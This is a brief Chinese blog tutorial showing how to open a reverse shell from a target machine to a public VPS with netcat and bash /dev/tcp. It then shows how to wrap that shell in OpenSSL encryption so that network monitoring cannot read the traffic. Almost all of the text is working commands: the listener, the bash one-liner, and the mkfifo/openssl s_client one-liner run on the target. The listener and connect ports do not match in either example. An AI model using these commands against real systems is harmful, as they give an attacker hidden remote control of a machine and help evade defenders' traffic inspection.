环境说明

  • 公网服务器一台
  • kali (内网)

未标题-1.jpg

简单的测试

在公网服务器执行命令

 nc -lvvp 4444

kali中执行命令

 bash -i >& /dev/tcp/公网ip/5555 0>&1

启动Wireshark开启抓包,分析流量。

测试

我们在终端中随便输入一条命令ifconfig,然后到Wireshark中查看。
QQ截图20190911130844.png
QQ截图20190911131150.png
我们可以清楚的看到,终端流量是通过明文传送。那么如何保证安全呢,这需要我们对明文流量加密处理。

openssl加密传输

第一步,在vps上生成SSL证书的公钥/私钥对

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

第二步,在VPS监听反弹shell

openssl s_server -quiet -key key.pem -cert cert.pem -port 4433

第三步,在目标上用openssl加密反弹shell的流量

mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -connect vps:443 > /tmp/s;rm /tmp/s

QQ截图20190911131150.png

流量已经被加密。

Last modification:September 15th, 2019 at 08:01 pm
正在沿街乞讨中……